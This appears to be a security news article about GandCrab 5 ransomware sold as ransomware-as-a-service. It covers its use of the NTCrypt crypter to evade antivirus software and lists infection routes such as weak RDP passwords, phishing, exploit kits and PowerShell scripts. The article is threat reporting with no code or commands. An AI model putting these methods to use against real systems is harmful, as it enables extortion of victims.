GandCrab 5 ransomware strains were recently released by different hacker collectives as ransomware-as-a-service. The available research shows that the developers behind them are probably offering them in underground markets in the form of RaaS.
Gandcrab 5 Ransomware Used In RaaS Attacks Against Targets Worldwide
Research around the recently released GandCrab 5 ransomware has led the experts to believe into believing that the new samples are being delivered as a “ransomware-as-a-service” (RaaS) malware. This is a popular threat which was being used in targeted worldwide attacks and in a relatively short time frame was able to compromise thousands of networks and computers — both to individual users, companies and large businesses.
Following the hackers movements it was discovered that the operators behind the attacks are partnering with a malware crypting service called NTCrypt. This is a malicious tool that is used to enhance the malicious code and make them more difficult to remove. It adds an extra layer of stealth protection — it seeks to find security software by looking out for their specific strings. The discovered apps will have their engines bypassed or entirely removed.
According to the experts this has led to the added exposure of the GandCrab 5 ransomware and fostered the creation of its many variants. Evidence of this is the announced competition of by the GandCrab 5 hackers before settling on NTCrypt.
Another reason for the success of the virus infections is the marketing approach undertaken by the virus operators. The use of several exploit kits and the large-scale intrusions and targeted campaigns has led to heightened demands of the core ransomware samples. There are multiple ways that the compromised machines are being attacked:
- Remote Desktop Connections Abuse — The hacker operators abuse default or weak username & password combinations. In some of the cases the string lists appear to be purchased from the hacker underground forums.
- Email Phishing Scams — The use of fake email messages that are modeled as being sent by legitimate Internet services and companies.
- Trojans — A sizable part of the GandCrab 5 infections appear to have been caused by Trojans that deliver the infection through an internal payload delivery script.
- Exploit Kits — One of the main methods for delivering the GandCrab 5 ransomware is the use of exploit kits such as RIG and Fallout.
- Shell Scripts — Through PowerShell scripts the GandCrab 5 ransomware can be delivered.
- Botnet Attacks — The use of botnets is an easy way to launch coordinated attacks.
The RaaS (Ransomware-as-a-service) model is an effective way to spread malware and ransomware, which enables even inexperienced hackers to spread infections on a global scale.